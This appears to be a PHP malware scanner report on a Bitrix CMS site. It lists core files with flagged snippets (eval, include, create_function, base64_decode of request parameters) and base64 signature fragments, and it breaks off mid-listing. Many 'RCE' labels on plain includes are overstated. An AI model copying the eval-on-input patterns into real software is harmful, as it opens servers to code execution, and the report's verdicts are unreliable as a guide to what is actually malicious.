eval('$res = '.$arParams['callback_pre_add'].'(\'callback_pre_add\', $arLocalHeader);'); if ($res == 0) { $arHeader['status'] = "skipped"$res 1; } if ($arHeader['stored_filename'] != $arLocalHeader['stored_filename']) { $arHeader['stored_filename'] = $this->_reducePath($arLocalHeader['stored_filename']); } } if ($arHeader['stored_filename'] == "") { $arHeader['status'] = "filtered"; } if (strlen($arHeader['stored_filename']) > 0xFF) { $arHeader['status'] = 'filename_too_long'; } if ($arHeade...

Sign 963e968a Line: 2571 Dangerous

Malware Signature (hash: 963e968a)

php_uname()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component.php

Size: 39.86 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 1398 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$epilogFile)

Exploit execution Line: 551 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__path."/component.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component_template.php

Size: 30.34 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 3
DescriptionMatch

Exploit execution Line: 714 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__fileAlt)

Exploit execution Line: 720 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__file)

Exploit execution Line: 877 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__folder."/result_modifier.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/sql_util.php

Size: 22.78 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/grids.php

Size: 16.11 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);')); return $arThemes; } public static function GetTheme($grid_id) { $aOptions = CUserOptions::GetOption("main.interface.grid", $grid_id, array()); if($aOptions["theme"] == '') { $aGlobalOptions = CUserOptions::GetOption("main.interface", "global", array(), 0); if($aGlobalOptions["theme_template"][SITE_TEMPLATE_ID] <> '') $theme = $aGlobalOptions["theme_template"][SITE_TEMPLATE_ID]; else $theme = ""; } else { $theme = $aOptions["th...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/main.php

Size: 144.72 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 4 Dangers: 8
DescriptionMatch

Exploit double_var2 Line: 223 Warning

Double var technique is usually used for the obfuscation of malicious code

${$key}

Exploit execution Line: 1424 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path)

Exploit execution Line: 207 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php")

Exploit execution Line: 209 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php")

Exploit execution Line: 289 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog".$isAdmin."_after.php")

Exploit execution Line: 306 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/auth/wrapper.php")

Exploit execution Line: 316 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog".$isAdmin.".php")

Exploit silenced_eval Line: 4588 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("return ".$strCondition.";")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'if($a[1] == $b[1]) return 0; return ($a[1] < $b[1])? -1 : 1;')); $res = array(); foreach($this->__view[$view] as $item) $res[] = $item[0]; return implode($res); } public static function OnChangeFileComponent($path, $site) { global $APPLICATION; if(!HasScriptExtension($path)) return; $docRoot = CSite::GetSiteDocRoot($site); CUrlRewriter::Delete( array("SITE_ID" => $site, "PATH" => $path, "ID" => "NULL") ); if (class_exists("\\Bitrix\\Main\\Application", false)) { \Bitri...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("?>".$fTmp->GetContents()); } $FILE_PERM = $PERM[$path_file]; if(!is_array($FILE_PERM)) $FILE_PERM = array(); if(!$bOverWrite && count($FILE_PERM)>0) return true; $bDiff = false; $str="<?\n"; foreach($arPermissions as $group=>$perm) { if(strlen($perm) > 0) $str .= "\$PERM[\"".EscapePHPString($path_file)."\"][\"".EscapePHPString($group)."\"]=\"".EscapePHPString($perm)."\";\n"; if(!$bDiff) { $curr_perm = $FILE_PERM[$group]; if(!isset($curr_perm) && preg_match('/^G[0-9]+$/', $group)) $curr_per...

Function posix_kill Warning

Potentially dangerous function `posix_kill`

[https://www.php.net/posix_kill]

posix_kill(getmypid(), 9);')); define("BX_FORK_AGENTS_AND_EVENTS_FUNCTION_STARTED", true); global $DB, $CACHE_MANAGER; $CACHE_MANAGER = new CCacheManager; $DBHost = $DB->DBHost; $DBName = $DB->DBName; $DBLogin = $DB->DBLogin; $DBPassword = $DB->DBPassword; $DB = new CDatabase; $DB->Connect($DBHost, $DBName, $DBLogin, $DBPassword); $app = \Bitrix\Main\Application::getInstance(); if ($app != null) { $con = $app->getConnection(); if ($con != null) $con->connect(); } $DB->DoConnect(); $DB->StartUsin...

Sign 11413268 Line: 1625 Dangerous

Malware Signature (hash: 11413268)

eval("?>

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_client.php

Size: 249.86 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 2 Dangers: 14
DescriptionMatch

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

'X1VwZGF0ZVN5c3RlbScpLCAwLCAxMDI0KTsKICAgICAgICAgICAgICAgICAgICBteV9yZXN1bHQ6PWRibXNfbG9jay5yZXF1ZXN0KG15X2xvY2tfaWQsIGRibXNfbG9jay54X21vZGUsIDAsIHRydWUpOwogICAgICAgICAgICAgICAgICAgIC0tICBSZXR1cm4gdmFsdWU6CiAgICAgICAgICAgICAgICAgICAgLS0gICAgMCAtIHN1Y2Nlc3MKICAgICAgICAgICAgICAgICAgICAtLSAgICAxIC0gdGltZW91dAogICAgICAgICAgICAgICAgICAgIC0tICAgIDIgLSBkZWFkbG9jawogICAgICAgICAgICAgICAgICAgIC0tICAgIDMgLSBwYXJhbWV0ZXIgZXJyb3IKICAgICAgICAgICAgICAgICAgICAtLSAgICA0IC0gYWxyZWFkeSBvd24gbG9jayBzcGVjaWZpZWQgYnk...

Exploit execution Line: 1 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER[___504618485(2217)

Exploit silenced_eval Line: 1 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($GLOBALS['____1347154205'][1005](array('<?php', '<?', '?>')

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($_267581649["#"]["cdata-section"][(910-2*455)]["#"]);} catch(Exception $_904795991){ $_1075876051___504618485(38).$_904795991->getCode().___504618485(39).$_904795991->getMessage();} $_143313344 .= ___504618485(40).$GLOBALS['____1347154205'][24]($_267581649[___504618485(41)][___504618485(42)]).___504618485(43).$GLOBALS['____1347154205'][25]($_1075876051);}} if(empty($_796463733)){ CUpdateClient::AddMessage2Log($GLOBALS['____1347154205'][26](___504618485(44), ___504618485(45), $_143313344))...

Sign 7186bb8d Line: 1 Dangerous

Malware Signature (hash: 7186bb8d)

RlZmluZ

Sign 7830f7a6 Line: 1 Dangerous

Malware Signature (hash: 7830f7a6)

N5c3Rlb

Sign 7f5d33bf Line: 1 Dangerous

Malware Signature (hash: 7f5d33bf)

JlcGxhY2

Sign 91535293 Line: 1 Dangerous

Malware Signature (hash: 91535293)

luY2x1ZG

Sign 99fc3b9d Line: 1 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign a408f408 Line: 1 Dangerous

Malware Signature (hash: a408f408)

c3RyX

Sign ae7830db Line: 1 Dangerous

Malware Signature (hash: ae7830db)

Y2xvc2

Sign d30fc49e Line: 1 Dangerous

Malware Signature (hash: d30fc49e)

b3Blb

Sign d97f004d Line: 1 Dangerous

Malware Signature (hash: d97f004d)

ZXhlYy

Sign de12c454 Line: 1 Dangerous

Malware Signature (hash: de12c454)

vcGVu

Sign ee1cb326 Line: 1 Dangerous

Malware Signature (hash: ee1cb326)

9wZW

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

'base64_decode'

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_list.php

Size: 1.21 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("parent."+this.name+"_"+str);
    }
    catch(e){}
}
</script>

</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="white">

<table width="100%" border="0" id="updates_items">
</table>

</body>
</html>
<? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/menu.php

Size: 15.46 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) $bSkipMenuItem = true; } if(!$bSkipMenuItem) $ITEM_INDEX++; if(($pos = strpos($LINK, "?"))!==false) $ITEM_TYPE = "U"; elseif(substr($LINK, -1)=="/") $ITEM_TYPE = "D"; else $ITEM_TYPE = "P"; $SELECTED = false; if($bCached) { $all_links = $arMenuCache[$iMenuItem]["LINKS"]; if(!is_array($all_links)) $all_links = array(); } else { $all_links = array(); if(is_array($ADDITIONAL_LINKS)) { foreach($ADDITIONAL_LINKS as $link) { $tested_link = trim(Rel2Abs($this->MenuDir, ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_class.php

Size: 140.73 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
DescriptionMatch

Exploit execution Line: 3798 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

Exploit silenced_eval Line: 3274 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\"),(\$order=\"\"),array(\"ACTIVE\"=>\"Y\"));\$cnt=0;while(\$ar_"."res=\$path->Fe"."tch())\$cnt++;"); return $cnt;} } public static function GetModuleVersion($module) { if (strlen($module)<=0) return false; $strModule_tmp_dir = $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module; if (file_exists($strModule_tmp_dir) && is_dir($strModule_tmp_dir)) { if ($module != "main") { if (file_exists($strModule_tmp_dir."/install/index.php")) { $arModule_...

Sign 696317c4 Line: 3274 Dangerous

Malware Signature (hash: 696317c4)

@eval("\

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_client_partner.php

Size: 75.03 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 564 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/site_checker.php

Size: 87.94 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 4
DescriptionMatch

Exploit execution Line: 2845 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')

Exploit execution Line: 2931 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/dbconn_error.php")

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('catdoc -V', $output, $return_var); if ($return_var === 0) { $version = $output[0]; if (strpos($version, '0.94.4') !== false || strpos($version, '0.94.3') !== false) $strError .= GetMessage('MAIN_CATDOC_WARN', array('#VERSION#' => $version)); } } return $this->Result(false, $strError); } function check_fast_download() { $tmp = $_SERVER['DOCUMENT_ROOT'].'/bitrix/tmp/success.txt'; if (!CheckDirPath($tmp) || !file_put_contents($tmp, 'SUCCESS')) return $this->Result(false, GetMessage("MAIN_TMP_...

Sign 471b95ee Line: 513 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

Sign 471b95ee Line: 515 Dangerous

Malware Signature (hash: 471b95ee)

SUHOSIN

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/wizard_site.php

Size: 40.55 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); if (array_key_exists("GROUPS", $arWizardTemplates) && is_array($arWizardTemplates["GROUPS"])) $this->arTemplateGroups = $arWizardTemplates["GROUPS"]; } function __GetInstallationScript() { $instScript = $_SERVER["DOCUMENT_ROOT"].$this->path."/wizard.php"; if (!is_file($instScript)) return false; $this->pathToScript = $instScript; return true; } function __GetServices() { $serviceFile = $_SERVER["DOCUMENT_ROOT"].$this->path."/....

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/controller_member.php

Size: 41.85 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 1076 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['parameters'])

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($disconnect_command); COption::SetOptionString("main", "controller_member", "N"); } public static function GetBackup($bRefresh = false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh) $arCachedData = unserialize(COption::GetOptionString("main", "~controller_backup", "")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main", "~controller_backup", serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/mysql/database.php

Size: 23.42 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
DescriptionMatch

Exploit double_var2 Line: 678 Warning

Double var technique is usually used for the obfuscation of malicious code

${$varnameFrom}

Exploit execution Line: 192 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbquery_error.php")

Exploit execution Line: 194 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/dbquery_error.php")

Function strrev eval_strrev Line: 126 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/mysql/agent.php

Size: 5.14 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$eval_result=".$arAgent["NAME"]); } catch (Exception $e) { CTimeZone::Enable(); $application = \Bitrix\Main\Application::getInstance(); $exceptionHandler = $application->getExceptionHandler(); $exceptionHandler->writeToLog($e); continue; } CTimeZone::Enable(); if ($logFunction) $logFunction($arAgent, "finish", $eval_result, $e); if($e === false) { continue; } elseif(strlen($eval_result)<=0) { $strSql = "DELETE FROM b_agent WHERE ID=".$arAgent["ID"]; } else { $strSql = "
                    UPDATE b_agen...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/spread.php

Size: 1.34 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_GET["s"])

Exploit execution Line: 7 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/public/top_panel.php

Size: 54.78 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 948 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/include/add_top_panel.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/public/menu_edit.php

Size: 21.81 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(\''.$out.'\');'?>

    var arCellsHTML = [
        '<span class="rowcontrol drag" title="<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_DRAG'))?>"></span>',
        getAreaHTML('text_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_TEXT_EDIT'))?>'),
        getAreaHTML('link_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_LINK_EDIT'))?>'),
        '<span onclick="if (!GLOBAL_bDisableActions) {currentLink = \'' + nums + '\'; OpenFileBrowserWindFile_' + nums + '();}" class="rowcontrol...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin_tools.php

Size: 23.88 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
DescriptionMatch

Exploit execution Line: 180 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].$root.$init."/.description.php")

Exploit execution Line: 232 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path_mod."/".$file_templ."/.description.php")

Exploit execution Line: 266 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path."/".$folder_name."/.description.php")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$v1,$v2','if ($v1>$v2) return 1; elseif ($v1<$v2) return -1;')); return $arrTemplate; } } class CTemplates { public static function GetList($arFilter = array(), $arCurrentValues = array(), $template_id = array()) { if(!is_set($arFilter, "FOLDER")) { $arr = CTemplates::GetFolderList(); $arFilter["FOLDER"] = array_keys($arr); } $arTemplates = array(); foreach($arFilter["FOLDER"] as $folder) { $folder = _normalizePath($folder); $arTemplates[$folder] = array(); $arPath = array( "/bi...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/index.php

Size: 649.00 B Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php")

Exploit execution Line: 15 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist.php

Size: 44.38 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=$arStates;?>);
        var DetailWindow = false;
        var arMainStat ={
            "REQUIRE":<?=$arStat["REQUIRE"];?>,
            "REQUIRE_CHECK":<?=$arStat["REQUIRE_CHECK"];?>,
            "FAILED":<?=$arStat["FAILED"];?>,
            "SUCCESS":<?=$arStat["CHECK"];?>,
            "SUCCESS_R":<?=$arStat["CHECK_R"];?>,
            "TOTAL":<?=$arStat["TOTAL"];?>
        };
        var arRequireCount=<?=$arStat["REQUIRE"];?>;
        var arRequireCheckCount=<?=$arStat["REQUIRE_CHECK"];?>;
        var arFailedCount = <?=$arStat["FAILED"];?>;
        var CanClose = "<?=$arCanClose;...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/user_admin.php

Size: 23.85 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 69 Warning

Double var technique is usually used for the obfuscation of malicious code

${$f}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/settings.php

Size: 11.09 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'if($a["SORT"] == $b["SORT"]) return strcasecmp($a["NAME"], $b["NAME"]); return ($a["SORT"] < $b["SORT"])? -1 : 1;')); $mid = $_REQUEST["mid"]; if($mid == "" || !isset($arModules[$mid]) || !file_exists($arModules[$mid]["PAGE"])) $mid = "main"; ob_start(); include($arModules[$mid]["PAGE"]); $strModuleSettingsTabs = ob_get_contents(); ob_end_clean(); $APPLICATION->SetTitle(GetMessage("MAIN_TITLE")); require_once ($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/pr...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist_detail.php

Size: 15.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 25 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("(" +data+")");
                var show_result = false;
                var buttons = BX.findChildren(BX('checklist-popup-tes-status'), {className:'checklist-popup-tes-status'});
                if (json_data.STATUS || stoptest == true)
                {
                    if (json_data.STATUS)
                    {
                        BX("show_detail_link").style.display = "none";
                        BX("detail_system_comment_<?=$jsTestID;?>").innerHTML = "";
                        currentStatus = json_data.STATUS;
                        RefreshCheckList(json_data);
                        for(var i=0; i<buttons.length; i++)
                        BX.removeCl...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/module_admin.php

Size: 7.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b', 'if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $fb = ($id == 'fileman' && !$USER->CanDoOperation('fileman_install_control')); if($isAdmin && !$fb && check_bitrix_sessid()) { if(strlen($_REQUEST["uninstall"])>0 || strlen($_REQUEST["install"])>0) { $id = str_replace("\\", "", str_replace("/", "", $id)); if($Module = CModule::CreateModuleObject($id)) { if($Modu...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/restore.php

Size: 162.40 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 701 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($l); } if ($DBName && !preg_match('#^\*+$#', $DBName)) { $strWarning .= '<li>'.getMsg('DBCONN_WARN'); $create_db = false; } else { $DBHost = 'localhost'.(file_exists($_SERVER['DOCUMENT_ROOT'].'/../BitrixEnv.exe') ? ':31006' : ''); $DBLogin = 'root'; $DBPassword = ''; $DBName = 'bitrix_'.(rand(11,99)); $create_db = "Y"; } } else { $DBHost = $_REQUEST["DBHost"]; $DBLogin = $_REQUEST["DBLogin"]; $DBPassword = $_REQUEST["DBPassword"]; $DBName = $_REQUEST["DBName"]; $create_db = $_REQUEST["creat...

Sign 7830f7a6 Line: 1755 Dangerous

Malware Signature (hash: 7830f7a6)

NvcH

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/update_system_market.php

Size: 29.34 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 88 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/update_system_market_notru.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist_report.php

